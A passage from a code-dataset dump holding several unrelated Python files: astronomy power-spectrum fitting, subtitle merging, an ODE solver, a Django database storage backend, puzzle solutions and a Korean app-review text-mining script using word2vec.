gaussFunc(x,a,mu,sig):\n return a*np.exp(-(x-mu)**2/(2*sig**2))\n\ndef computePS(intImage,angResolution,numPadPix,origAngExt):\n intImage_Scaled = intImage[:,:]#/1.82e18\n where_are_NaNs = np.isnan(intImage_Scaled)\n intImage_Scaled[where_are_NaNs] = 0.\n plotPS = True\n print('Creating Modulus Image...')\n modulusImage = np.abs(np.fft.fftshift(np.fft.fft2(intImage_Scaled,[int(numPadPix),int(numPadPix)])))**2\n\n lowerRadius, upperRadius, spatialScale = scale(numPadPix,angResolution,origAngExt)\n\n ##arrays to hold results\n medianList = []\n errList = []\n for ring in range(0,18):\n print('Computing median value within annulus: '+np.str(ring+1)) \n colDenDist = []\n for i in range(0,int(numPadPix)):\n for j in range(0,int(numPadPix)):\n radius = np.sqrt((i-(numPadPix/2-1))**2+(j-(numPadPix/2-1))**2)\n if lowerRadius[ring] <= radius <= upperRadius[ring]:\n colDenDist.append(modulusImage[i,j])\n colDenDistArr = np.array(colDenDist, dtype='float32')\n medianList.append(np.median(colDenDistArr)) \n errList.append(np.median(np.abs(colDenDistArr-medianList[ring])))\n\n\n print('Fitting spectra...')\n errArr = np.array(errList, dtype='float32')\n medianArr = np.array(medianList, dtype='float32')\n errArr_Log = errArr/(medianArr*np.log(10))\n spatialScaleLog = np.log10(spatialScale)\n\n coeffs,matcov = curve_fit(linFunc,spatialScaleLog,np.log10(medianList),[1,1],sigma=errArr_Log)\n\n fitList = []\n for i in range(0,18):\n fitList.append(coeffs[0]*spatialScaleLog[i]+coeffs[1])\n error = np.sqrt(np.diag(matcov))\n print('Slope: '+np.str(coeffs[0]))\n print('Error: '+np.str(error[0]))\n if plotPS == False:\n pyplot.errorbar(spatialScale,np.log10(medianArr),yerr=errArr_Log, fmt='o')\n pyplot.plot(spatialScale,fitList, color='black', linewidth=2,label=r'${}^{13}$CO Slope: $-$%.2f' % coeffs[0]+'+/$-$'+'%.2f' % error[0])\n pyplot.xlim(100,0.5)\n pyplot.xscale('log')\n pyplot.ylabel(r'Log$_{10}$(Power)')\n pyplot.xlabel(r'Linear Scale [pc]')\n pyplot.legend(loc=0, fontsize=14)\n #pyplot.savefig('/Users/npingel/Desktop/Perseus_intPS_13CO_MADErrors', bbox_inches='tight')\n pyplot.show()\n pyplot.clf()\n return coeffs[0], error[0]\n \n\n\n","sub_path":"VCA/SPSModule.py","file_name":"SPSModule.py","file_ext":"py","file_size_in_byte":4543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"277299855","text":"import webvtt\nimport sys\n\nif len(sys.argv) < 4:\n print(\"need file names\")\n sys.exit(1)\n\ndef rreplace(s, old, new):\n li = s.rsplit(old, 1)\n return new.join(li)\n\ndef convert_file(file_name, main_lang, sub_lang):\n file_name_sub = rreplace(file_name, main_lang, sub_lang)\n #print(file_name + '\\n' + file_name_sub)\n #return\n vtt_main = webvtt.read(file_name)\n vtt_sub = webvtt.read(file_name_sub)\n\n # while loop all korean time captions\n index_main = 0\n index_sub = 0\n while index_main < len(vtt_main):\n while index_sub < len(vtt_sub):\n caption_main = vtt_main[index_main]\n caption_sub = vtt_sub[index_sub]\n\n if (caption_main.start <= caption_sub.start):\n #print(\"##### \" + caption_main.text.replace(\"‎\",\"\").replace(\"\\n\",\"\\n##### \"))\n print(\"

\" + caption_main.text.replace(\"‎\",\"\") + \"

\")\n break\n else:\n print(\"

\" + caption_sub.text.replace(\"‎\", \"\") + \"

\")\n print(\"\")\n index_sub += 1\n index_main += 1\n\n # finish final z index\n while index_sub < len(vtt_sub):\n print(caption_sub.text)\n index_sub += 1\n\n #print('end of ' + file_name)\n\n# main\nprint(\"\")\nlang_main = sys.argv[1]\nlang_sub = sys.argv[2]\nfor i in range(3, len(sys.argv)):\n print('Episode' + str(i - 2) + '')\n print('

======================')\n print('

Episode ' + str(i - 2))\n print('

======================')\n print('')\n convert_file(sys.argv[i], lang_main, lang_sub)\n\nprint(\"\")\n","sub_path":"convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":1486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"205647782","text":"from math import exp\n\ndef f1(x: float, u1: float, u2: float):\n value = -500.005 * u1 + 499.995 * u2\n return value\n\ndef f2(x: float, u1: float, u2: float):\n value = 499.995 * u1 - 500.005 * u2\n return value\n\ndef f1_true(x: float):\n value = 10 * exp(-0.01 * x) - 3 * exp(-1000 * x)\n return value\n\ndef f2_true(x: float):\n value = 10 * exp(-0.01 * x) + 3 * exp(-1000 * x)\n return value\n\ndef calculate_true(x: float):\n return f1_true(x), f2_true(x)\n\ndef rk2euler(x_curr: float, v1_curr: float, v2_curr: float, h: float):\n x_euler = x_curr + h\n v1_euler = v1_curr + h * f1(x_curr, v1_curr, v2_curr)\n v2_euler = v2_curr + h * f2(x_curr, v1_curr, v2_curr)\n\n x_next = x_euler\n v1_next = v1_curr + 0.5 * h * (f1(x_curr, v1_curr, v2_curr) + f1(x_euler, v1_euler, v2_euler))\n v2_next = v2_curr + 0.5 * h * (f2(x_curr, v1_curr, v2_curr) + f2(x_euler, v1_euler, v2_euler))\n return x_next, v1_next, v2_next\n\ndef print_header():\n print(\"|Итерация |Время |Численное решение |Точное решение |Глобальная погрешность |\")\n print(\"|---------|----------|---------------------------------------------------|---------------------------------------------------|---------------------------------------------------|\")\n print(\"|{0:9}|{1:10.5}|{2:25}|{3:25}|{4:25}|{5:25}|{6:25}|{7:25}|\".format(\"n\", \"Xn\", \"V1\", \"V2\", \"U1\", \"U2\", \"E1\", \"E2\"))\n\ndef print_string(iter: int, x: float, v1: float, v2: float, u1: float, u2: float, e1: float, e2: float):\n print(\"|{0:9}|{1:10.5}|{2:25}|{3:25}|{4:25}|{5:25}|{6:25}|{7:25}|\".format(iter, x, v1, v2, u1, u2, e1, e2))\n\ndef print_table(x_list: list, v1_list: list, v2_list: list, u1_list: list, u2_list: list):\n print_header()\n number_iters = len(x_list)\n if number_iters < 150:\n for i in range(number_iters):\n print_string(i, x_list[i], v1_list[i], v2_list[i], u1_list[i], u2_list[i], u1_list[i] - v1_list[i], u2_list[i] - v2_list[i])\n else:\n for i in range(101):\n print_string(i, x_list[i], v1_list[i], v2_list[i], u1_list[i], u2_list[i], u1_list[i] - v1_list[i], u2_list[i] - v2_list[i])\n for i in range(30, 0, -1):\n print_string(number_iters - i, x_list[-i], v1_list[-i], v2_list[-i], u1_list[-i], u2_list[-i], u1_list[-i] - v1_list[-i], u2_list[-i] - v2_list[-i])\n\ndef calculate(x_start: float, v1_start: float, v2_start: float, h_start: float, epsilon: float):\n x_list = [x_start]\n v1_list = [v1_start]\n v2_list = [v2_start]\n u1_list = [v1_start]\n u2_list = [v2_start]\n\n x_curr, v1_curr, v2_curr, h = x_start, v1_start, v2_start, h_start\n for i in range(1, number_iter + 1):\n if right_break <= x_curr:\n break\n while(True):\n x_next, v1_next, v2_next = rk2euler(x_curr, v1_curr, v2_curr, h)\n x05, v1_05, v2_05 = rk2euler(x_curr, v1_curr, v2_curr, h / 2)\n _, v12, v22 = rk2euler(x05, v1_05, v2_05, h / 2)\n e = max(abs(v1_next - v12), abs(v2_next - v22)) / 3\n if epsilon < e:\n h /= 2\n continue\n if epsilon / 3 <= e <= epsilon:\n break\n if e < epsilon / 3:\n h *= 2\n break\n u1, u2 = calculate_true(x_next)\n x_curr, v1_curr, v2_curr = x_next, v1_next, v2_next\n x_list.append(x_curr)\n v1_list.append(v1_curr)\n v2_list.append(v2_curr)\n u1_list.append(u1)\n u2_list.append(u2)\n return x_list, v1_list, v2_list, u1_list, u2_list\n\nnumber_iter = 250000\nright_break = 500\nx_start, v1_start, v2_start = 0.0, 7.0, 13.0\nh_start = 0.01\nepsilon = 0.0000001\n\ndef main():\n print_table(*calculate(x_start, v1_start, v2_start, h_start, epsilon))\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"hard_system/hard_system.py","file_name":"hard_system.py","file_ext":"py","file_size_in_byte":3918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"640647774","text":"\"\"\"\nFrites\n======\n\nFramework of Information Theory for Electrophysiological data and Statistics\n\"\"\"\nimport logging\n\nfrom frites import (io, core, conn, stats, utils, workflow, simulations, # noqa\n estimator)\n\n__version__ = \"0.3.8\"\n\n# -----------------------------------------------------------------------------\n# Set 'info' as the default logging level\nlogger = logging.getLogger('frites')\nio.set_log_level('info')\n\n# -----------------------------------------------------------------------------\n# get / set config\n\n\ndef get_config():\n \"\"\"Get the global configuration of frites.\"\"\"\n from frites.config import CONFIG\n return CONFIG\n\n\ndef set_config(key, value, verbose=None):\n \"\"\"Change the global config of frites.\n\n Parameters\n ----------\n key : string\n Entry of the config\n value : dict / list\n The new value for the selected key. The type should be the same as the\n default one\n \"\"\"\n io.set_log_level(verbose)\n assert isinstance(key, str)\n CONFIG = get_config() # noqa\n assert key in CONFIG.keys(), f\"The key {key} doesn't exist.\"\n CONFIG[key] = value\n logger.info(f\"The key {key} has been updated\")\n","sub_path":"frites/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"358997534","text":"import os\r\nfrom ASP_Classes import *\r\n\r\n\r\ndef line2class(character):\r\n switcher = {\r\n '*': 0,\r\n 'G': 1,\r\n 'T': 2,\r\n 'LT': 3,\r\n 'Vb': 4,\r\n 'Sb': 5,\r\n }\r\n return switcher.get(character,0)\r\n\r\ndef initCircuit(lineSplit):\r\n global circ1\r\n\r\n if lineSplit[0][0] == 'G': # init new generator\r\n tempGen = Generator(lineSplit)\r\n circ1.generators.append(tempGen)\r\n elif lineSplit[0][0] == 'T':\r\n tempTrans = Transformer(lineSplit)\r\n circ1.transformers.append(tempTrans)\r\n elif lineSplit[0][0] == 'L':\r\n if lineSplit[0][1] == 'T':\r\n tempLine = TransmissionLine(lineSplit)\r\n circ1.transmissionLines.append(tempLine)\r\n elif lineSplit[0][0] == 'C':\r\n pass\r\n\r\ndef main():\r\n global circ1\r\n\r\n with open(\"Circ1.txt\") as f:\r\n lines = f.readlines()\r\n for line in lines:\r\n lineSplit = line.split(\" \")\r\n initCircuit(lineSplit)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n circ1 = Circuit(\"Circ1.txt\")\r\n main()\r\n\r\n\r\n","sub_path":"ASP_simulator/ASP.py","file_name":"ASP.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"585208748","text":"from database_files import models\nfrom database_files.module_settings import DBF_SETTINGS\nfrom django.core.files.storage import Storage\nfrom django.core.urlresolvers import reverse\nfrom django.conf import settings\nimport os\n\nclass DatabaseStorage(Storage):\n\n\tdef __init__(self, encrypt=DBF_SETTINGS[\"DATABASE_FILES_ENCRYPTION\"], compress=DBF_SETTINGS[\"DATABASE_FILES_COMPRESSION\"], *args, **kwargs):\n\t\tself.encrypt = encrypt\n\t\tself.compress = compress\n\t\tsuper(DatabaseStorage, self).__init__(*args, **kwargs)\n\n\tdef _open(self, name, mode='rb'):\n\t\ttry:\n\t\t\tf = models.DatabaseFile.objects.get(filepath=name)\n\t\texcept models.DatabaseFile.DoesNotExist:\n\t\t\treturn None\n\t\treturn f.retreive()\n\n\tdef _save(self, name, content):\n\t\tnewname = name\n\t\tnewpath, newfilename = os.path.split(name)\n\t\tnewfilenamestem, newfilenameext = os.path.splitext(newfilename)\n\t\tpostpend = 0\n\t\twhile self.exists(newname):\n\t\t\tpostpend += 1\n\t\t\tnewname = newpath + newfilenamestem + \"-\" + unicode(postpend) + newfilenameext\n\t\tf = models.DatabaseFile.objects.create(\n\t\t\t\tfilepath=newname,\n\t\t\t\t)\n\t\tf.store(content,\n\t\t\t\tencrypt=self.encrypt,\n\t\t\t\tcompress=self.compress,\n\t\t\t\t)\n\t\treturn newname\n\n\tdef exists(self, name):\n\t\treturn models.DatabaseFile.objects.filter(filepath=name).exists()\n\n\tdef delete(self, name):\n\t\ttry:\n\t\t\tmodels.DatabaseFile.objects.get(filepath=name).delete()\n\t\texcept models.DatabaseFile.DoesNotExist:\n\t\t\tpass\n\n\tdef url(self, name):\n\t\ttry:\n\t\t\tfile = models.DatabaseFile.objects.get(filepath=name)\n\t\texcept models.DatabaseFile.DoesNotExist:\n\t\t\treturn None\n\t\treturn reverse('database_file', kwargs={'file_id': file.pk})\n\n\tdef size(self, name):\n\t\ttry:\n\t\t\treturn models.DatabaseFile.objects.get(filepath=name).size\n\t\texcept models.DatabaseFile.DoesNotExist:\n\t\t\treturn 0\n\n\tdef modified_time(self, name):\n\t\ttry:\n\t\t\treturn models.DatabaseFile.objects.get(filepath=name).modified_time\n\t\texcept models.DatabaseFile.DoesNotExist:\n\t\t\treturn None\n\n\tdef accessed_time(self, name):\n\t\ttry:\n\t\t\treturn models.DatabaseFile.objects.get(filepath=name).accessed_time\n\t\texcept models.DatabaseFile.DoesNotExist:\n\t\t\treturn None\n\n\tdef created_time(self, name):\n\t\ttry:\n\t\t\treturn models.DatabaseFile.objects.get(filepath=name).created_time\n\t\texcept models.DatabaseFile.DoesNotExist:\n\t\t\treturn None\n","sub_path":"database_files/storage.py","file_name":"storage.py","file_ext":"py","file_size_in_byte":2256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"32957213","text":"from custom.math import (triangle_number as tri, square_number as squ,\n pentagonal_number as pen, hexagonal_number as hex,\n heptagonal_number as hep, octagonal_number as oct)\n\ndef poly_n(n):\n return (3, tri(n)), (4, squ(n)), (5, pen(n)), (6, hex(n)), (7, hep(n)), (8, oct(n))\n\n\ndef next(types, value):\n if len(types) == 6 and value[0] // 100 == value[-1] % 100: # First two 0 == last two 6\n print(value, sum(value))\n else:\n for t, n in dic.get((types[-1], value[-1]), []):\n if t not in types:\n next(types+[t], value+[n])\n\npolys = []\nstart = 19 # 19 oct is first > 999 so start here\nend = 141 # 141 tri is first > 9999 so cut off here\n\nfor n in range(start, end):\n for type, value in poly_n(n):\n if 1000 <= value <= 9999 and value % 100 > 9:\n polys.append((type, value))\n\ndic = {}\n\nfor type_1, value_1 in polys:\n for type_2, value_2 in polys:\n if type_1 != type_2 and value_1 % 100 == value_2 // 100:\n dic[type_1, value_1] = dic.get((type_1, value_1), []) + [(type_2, value_2)]\n\nfor type, value in dic:\n next([type], [value])\n","sub_path":"Problems 051 - 100/Problem 061.py","file_name":"Problem 061.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"78440091","text":"import bs4\n\nindex = open('index.html')\nindexSoup = bs4.BeautifulSoup(index, \"html.parser\")\n\ndef displayMatches(selected):\n \"\"\"Displays the text of selected elements\"\"\"\n for ix, el in enumerate(selected):\n print(\"\\t\" + str(ix+1) + \".) \" + el.getText())\n print(\"\")\n\nprint(\"Title:\", indexSoup.select('title')[0].getText())\n\npars = indexSoup.select('p')\nprint(\"Paragraphs:\")\ndisplayMatches(pars)\n \nlinks = indexSoup.select('a')\nprint(\"Links:\")\ndisplayMatches(links)\n\nbigtext = indexSoup.select('.bigtext')\nprint(\"With class 'bigtext':\")\ndisplayMatches(bigtext)\n\nscraem = indexSoup.select('#scraem')\nprint(\"With ID 'scraem':\")\ndisplayMatches(scraem)\n ","sub_path":"043-beautiful-soup/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"546860083","text":"import clr\nclr.AddReference('System.Drawing')\nclr.AddReference('System.Windows.Forms')\n\nfrom System.Drawing import *\nfrom System.Windows.Forms import *\n\nclass MyForm(Form):\n def __init__(self):\n # Create child controls and initialize form\n\n #hello btn\n self.btn = Button()\n self.btn.Text = 'Hello'\n self.btn.AutoSize = True\n self.btn.Location = Point(5,5)\n self.btn.Click += self.btn_Click\n #hello lable\n self.lbl = Label()\n self.lbl.Text = \"this is a word\"\n self.lbl.Location = Point(50,5)\n \n \n # add Controls \n self.Controls.Add(self.btn)\n self.Controls.Add(self.lbl)\n #define event \n def btn_Click(self,sender,e):\n MessageBox.Show(\"hello\")\n \n\nApplication.EnableVisualStyles()\nApplication.SetCompatibleTextRenderingDefault(False)\n\nform = MyForm()\nApplication.Run(form)\n\n","sub_path":"Python/Project/WindowsApplication1/WindowsApplication1/WindowsApplication1.py","file_name":"WindowsApplication1.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"623984660","text":"linha = list()\ncoluna = list()\nmatriz = list()\npares = 0\nsoma = 0\n\n#lina\nfor poslin in range(0, 3):\n for poscol in range(0, 3):\n valor = int(input(f'Digite um valor para [{poslin}, {poscol}]: '))\n coluna.insert(poscol, valor)\n \n \n linha.insert(poslin, coluna[:])\n coluna.clear()\n \nmatriz = linha[:]\n\nprint('=-'*30)\nfor linmat in matriz:\n for colmat in linmat:\n print(f'[{colmat:^5}]',end='')\n\n #soma dos valores pares\n if colmat % 2 == 0:\n pares += colmat\n \n print('')\nprint('=-'*30)\n\n\n\nprint(f'A soma dos valores pares é {pares}')\n\nfor c in range(0,3):\n soma += matriz[c][2]\nprint(f'A soma dos valores da terceira coluna é {soma}')\n\n\nprint(f'O maior valor da segunda linha é {max(matriz[1])}')\n","sub_path":"ex087maissobrematriz.py","file_name":"ex087maissobrematriz.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"123015140","text":"input = 1358\n\ndef isOpen(x, y):\n number = (x * x) + (3 * x) + (2 * x * y) + y + (y * y)\n number += input\n binary = bin(number)\n one = 0\n for b in binary:\n if b == \"1\":\n one += 1\n return one % 2 == 0\n\nvisited = {}\npossible = []\ndestination = False\n\ndef rec(x, y, steps):\n global destination\n\n # dont visit multiple times, which could create loops\n if (x,y) in visited or x < 0 or y < 0:\n return\n\n if steps == 51:\n destination = True\n return\n \n # add to visited\n visited[(x,y)] = True\n\n steps += 1\n # check if possible to set a step for every direction\n if isOpen(x+1, y):\n possible.append([x+1, y, steps])\n if isOpen(x, y+1):\n possible.append([x, y+1, steps])\n if isOpen(x-1, y):\n possible.append([x-1, y, steps])\n if isOpen(x, y-1):\n possible.append([x, y-1, steps])\n\nrec(1, 1, 0) # starting point\nwhile not destination:\n for i in possible:\n rec(i[0], i[1], i[2])\n\nprint(len(visited))\n\n# part 2: 141\n","sub_path":"2016/13/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"340176702","text":"import json\n\nfrom klein import Klein\nfrom twisted.internet import reactor\nfrom twisted.internet.defer import inlineCallbacks, returnValue\n\nfrom paradrop.base import pdutils\nfrom paradrop.base.output import out\nfrom . import cors\n\n\nclass ChangeApi(object):\n routes = Klein()\n\n def __init__(self, update_manager):\n self.update_manager = update_manager\n\n @routes.route('/', methods=['GET'])\n def get_changes(self, request):\n \"\"\"\n Get list of active and queued changes.\n\n Note: we use the term \"change\" even though, internally, the objects are\n referred to as \"updates\". The word \"update\" has become so overloaded it\n causes much confusion. A \"change\" is an atomic and self-contained\n alteration to the running state of the system. A \"change\" could install\n a chute, remove a chute, change the host configuration, etc.\n \"\"\"\n cors.config_cors(request)\n request.setHeader('Content-Type', 'application/json')\n\n changes = []\n\n update = self.update_manager.active_change\n if update is not None:\n changes.append({\n 'id': update.change_id,\n 'updateClass': update.updateClass,\n 'updateType': update.updateType,\n 'name': getattr(update, 'name', None),\n 'version': getattr(update, 'version', None),\n 'status': 'processing'\n })\n\n for update in self.update_manager.updateQueue:\n changes.append({\n 'id': update.change_id,\n 'updateClass': update.updateClass,\n 'updateType': update.updateType,\n 'name': getattr(update, 'name', None),\n 'version': getattr(update, 'version', None),\n 'status': 'queued'\n })\n\n return json.dumps(changes)\n","sub_path":"paradrop/daemon/paradrop/backend/change_api.py","file_name":"change_api.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"101089229","text":"from string import ascii_letters\nfrom nltk.tokenize import sent_tokenize\nfrom wordcloud import WordCloud\nfrom PIL import Image\nfrom wordcloud import ImageColorGenerator\nfrom gensim.models import word2vec\nfrom sklearn.manifold import TSNE\n\n\nimport nltk\nimport math\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport matplotlib.pyplot as plt\nfrom konlpy.tag import Okt\n\n'''\n불러오는 파일 목록\n update_word_remake.csv : 업데이트 날짜, 업데이트 분류 키워드 항목\n update_review/update_review_YYYY년MM월DD일.csv : 업데이트 기간별 리뷰 데이터\n noun stopword.txt \n YYYY년MM월DD일_category.txt\n \n \n저장하는 파일 목록\n'''\n\n\n\nplt.rc('font', family='Malgun Gothic')\nplt.rcParams[\"figure.figsize\"] = (15,6)\n\n# 감정별 이미지\nimage_path = {'긍정':'positive.png','부정':'negative.jpg','복합':'middle.png'}\n\nfilename = 'update_word_remake.csv'\nforFrame = pd.read_csv(filename,index_col=0,usecols=['update_id','year','month','day','word'])\n\n# fd 전체 날짜\nforFrame['fd'] = forFrame['year'].apply(lambda x : str(x))\nforFrame['fd'] += forFrame['month'].apply(lambda x : '-'+str(x))\nforFrame['fd'] += forFrame['day'].apply(lambda x : '-'+str(x))\n\n\ndef analyData(forFrame):\n # 내가 사용할 형태소 분석기 불러오기\n okt = Okt()\n review_dict = {}\n\n\n # 불용어 처리\n Stopword = open('noun_stopword.txt','r',encoding='utf-8').read().split(',')\n # 각 업데이트별 데이터 분석\n for itrow in forFrame.iterrows():\n # 해당 업데이트에 관련된 리뷰데이터 파일 불러오기\n reviewframe = pd.read_csv(f'update_review/update_review_{itrow[1][0]}년{itrow[1][1]}월{itrow[1][2]}일.csv')\n\n # 리뷰프레임을 Label로 구별하여 review_dict 사전에 넣기\n # review_dict['긍정'] = reviewframe\n review_dict['긍정'] = reviewframe[reviewframe['LABEL'] =='긍정']\n review_dict['복합'] = reviewframe[reviewframe['LABEL'] == '복합']\n review_dict['부정'] = reviewframe[reviewframe['LABEL'] == '부정']\n # review_dict['긍정'] = pd.concat([review_dict['긍정'],review_dict['복합']])\n\n\n # 감정별 데이터 분석\n for label,f in review_dict.items(): # items(감정, 감정 프레임)\n print(label)\n\n frame_row = [] # 명 : 키워드 , ��: 키워드 , 동 : 키워드\n\n noun_tokens = set() # score에 사용할 명사 데이터\n adjec_s = set()\n verb_s = set()\n unk_s = set()\n freq_dict = {}\n all_sentense_list = []\n\n # 리뷰 개수 설정하기\n item_cnt = 30000\n text_id_list = list(f['ID'][:item_cnt])\n print(text_id_list)\n # 각 감정 프레임에서 리뷰 100개만 형태소 분석기 돌리기\n # 한 리뷰에 해당하는 단어들 집합 넣을 사전 : TDM 행렬을 만드는데 사용\n review_tokens_dict = dict()\n for textid,text in enumerate(f['CONTENTS'][:item_cnt]): # contents iter\n # 해당 리뷰의 토큰은 textid key로 value list에 다 담는다.\n review_tokens_dict[text_id_list[textid]] = list()\n\n # 리뷰 문자 토큰화\n sent_tokens = sent_tokenize(text)\n # print(sent_tokens)\n # print('sent_l',len(sent_l))\n\n\n # 각 문장 토큰 단어 토큰화하기\n for sent_token in sent_tokens:\n\n word_tokens = [] # 각 문자의 단어 토큰\n\n # okt 형태소 분석기\n pos = okt.pos(sent_token,norm=True)\n # print(pos)\n\n # 명사,동사,형용사 만 추출하기\n pos = [x for x in pos\n if x[0] not in('롤러','지금','다른') and\n x[1] in ['Noun','Verb','Adjective','Unknown'] and\n len(x[0])>1]\n print(pos)\n # word2vec에 학습시킬 데이터 (명사,형용사,동사)\n word_tokens.extend([ x[0] for x in pos ])\n\n # word2vct 학습후 가중치행렬롤 만든 키워드 ( 명사)\n noun_tokens.update([ x[0] for x in pos if x[1] in ['Noun'] ]) # 중복제거 있음\n\n review_tokens_dict[text_id_list[textid]].extend([ x[0] for x in pos if x[1] in ['Noun'] ]) # 중복제거 없음 : 빈도수 행렬\n\n # 학습데이터 집합에 넣기\n all_sentense_list.append(word_tokens)\n # end Okt 형태소 분석기\n \"\"\" \n end result :\n all_sentense_list\n review_tokens_dict\n noun_tokens\n \"\"\"\n # end sent_tokenizer 문장 분석기\n\n\n # 분류한 토큰으로 word2vec 학습 시키기\n model = word2vec.Word2Vec(all_sentense_list,\n size=100,\n window=3,\n iter=5,\n min_count=1,\n hs=1,\n sg=1,\n workers=6)\n\n # size 100 concat_data dimesion 2로 줄이기\n tsne = TSNE(n_components=2) # 2차원 설정\n\n # noun_vocab : 학습된 명사 모록\n noun_vocab = [ w for w in model.wv.vocab if w in noun_tokens and w not in Stopword]\n W_data = model.wv[noun_vocab]\n # tsne\n W_tsne = tsne.fit_transform(W_data)\n\n # 차원 축소한 데이터 dataframe으로 만들기\n tsneFrame = pd.DataFrame(W_tsne,index=noun_vocab,columns=['x','y'])\n tsneFrame.to_csv(f'uclid_data/tsneFrame_{label}.csv')\n # print(tsneFrame)\n\n ################################\n # plt.figure()\n # # tsne프레임으로 좌표 그리기\n #\n # # fig.set_size_inches(100, 80)\n # # ax = fig.subplots()\n #\n # plt.scatter(tsneFrame['x'], tsneFrame['y'])\n # plt.title(f'{label}의 명사 관계도')\n # for word, pos in tsneFrame.iterrows():\n # plt.annotate(word, pos, fontsize=5)\n # ### 좌표 그리고 그 표를 파일로 저장하기\n # plt.savefig(f'uclid_data/{label}_noun_scatter.png', dpi=600, bbox_inches='tight')\n ###############################################\n\n # 거리 행렬 구하기 : noun_vocab * noun_vocab\n # 거리 행렬 프레임 데이터\n data_n = len(noun_vocab)**2\n print('data_n','\\n',data_n)\n uclid_data_list = list()\n\n sum_distance = 0\n for e1,row in tsneFrame.iterrows():\n frame_row_dict = dict()\n\n mean = 0\n\n # 기준 단어 좌표\n e1x = row.x\n e1y = row.y\n\n # 상대 단어 좌표와의 유클리드 거리 계산\n for e2 in noun_vocab:\n e2x = tsneFrame.loc[e2].x\n e2y = tsneFrame.loc[e2].y\n # 유클리드 거리 계산\n distance = math.sqrt((e1x-e2x)**2+(e1y-e2y)**2)\n sum_distance += distance\n frame_row_dict[e2] = distance\n # end row distance calculation\n uclid_data_list.append(frame_row_dict)\n uclidFrame = pd.DataFrame(uclid_data_list,index=noun_vocab)\n uclidFrame.to_csv(f'uclid_data/uclidFrame_{label}.csv')\n\n mean_distance = sum_distance/data_n\n\n v = 0\n\n for idx,row in uclidFrame.iterrows():\n for distance in row:\n v += (distance - mean_distance)**2\n\n v = v/data_n\n\n # var = uclidFrame.var()\n # print('var','\\n',var)\n # 가중치 행렬 구하기 : exp(-(거리 제곱)/(2*분산))\n weight_data_list = list()\n for w in noun_vocab:\n one_row_dict = dict()\n #가중치 계산\n # v = var[w]\n for wid,dis in uclidFrame[w].items():\n weight = math.exp(-(dis**2)/(2*v))\n one_row_dict[wid] = weight\n weight_data_list.append(one_row_dict)\n\n weightFrame = pd.DataFrame(weight_data_list,index=noun_vocab)\n weightFrame.to_csv(f'uclid_data/weightFrame_{label}.csv')\n\n # 가중치 행렬에서 업데이트 관련 키워드만 추출(명사)\n # 실제 채점할 단어 목록 리스트\n # print(list(itrow[1]['word']))\n up_kwd_list = itrow[1]['word'].split(',')\n # up_kwd_list = ['태블릿', '토큰', '조이스틱', '기기',\\\n # '매칭', '찾기', '트로피', '오락실', '테이크다운', \\\n # '바이러스', '비비', '닌자', '큐피트', '에이전트', \\\n # '길거리', '코알라', '히로인', '보석', '핫존', '미스터', '로봇', '깡통', '가방']\n category_noun_list = [w for w in weightFrame.index if w in up_kwd_list]\n # print('category_noun_list',category_noun_list)\n categoryFrame = weightFrame.loc[category_noun_list,:]\n # print('categoryFrame',categoryFrame)\n\n\n\n # TDM 행렬 구하기 : 단어 : 빈도수\n TDM_data_list = []\n for textid,review_token in review_tokens_dict.items():\n one_row_dict = {x:0 for x in noun_vocab}\n for t in review_token:\n if t in noun_vocab:\n one_row_dict[t] = one_row_dict[t]+1\n TDM_data_list.append(one_row_dict)\n\n TdmFrame = pd.DataFrame(TDM_data_list,index = review_tokens_dict.keys()).T\n TdmFrame.to_csv(f'uclid_data/tdmFrame_{label}.csv')\n\n # print(TdmFrame)\n\n score_arr = np.dot(categoryFrame,TdmFrame)\n\n # print('score_arr',score_arr)\n scoreFrame = pd.DataFrame(score_arr,index=category_noun_list,columns=review_tokens_dict.keys())\n # print(scoreFrame)\n scoreFrame.to_csv(f'uclid_data/scoreFrame_{label}.csv')\n # print(scoreFrame)\n # 분류된 단어 리스트\n top_word_list = []\n for textid, row in scoreFrame.T.iterrows():\n sort_key = row.sort_values(ascending=False)[:1].index\n # print(sort_key)\n top_word_list.append(list(sort_key)[0])\n print(top_word_list)\n # 분류된 단어 목록 파일에 저장\n with open(f'top_word_list_{label}.txt','w',encoding='utf-8') as file:\n file.write(','.join(top_word_list))\n\n # 분류된 단어가 속한 카테고리로 카운트:\n # txt file format\n # category1:kwd1,kwd2,kwd3....\n # category2:kwd1,kwd2,kwd3....\n imsi_list = [x.strip() for x in open(f'reference_category/{itrow[1][0]}년{itrow[1][1]}월{itrow[1][2]}일_category.txt', 'r', encoding='utf-8').readlines()]\n # 카테고리별 단어 집합 사전\n\n Category_dict = {i.split(':')[0]: i.split(':')[1].split(',') for i in imsi_list}\n Category_detail = {i.split(':')[0]:dict() for i in imsi_list}\n # 카테고리 : []\n 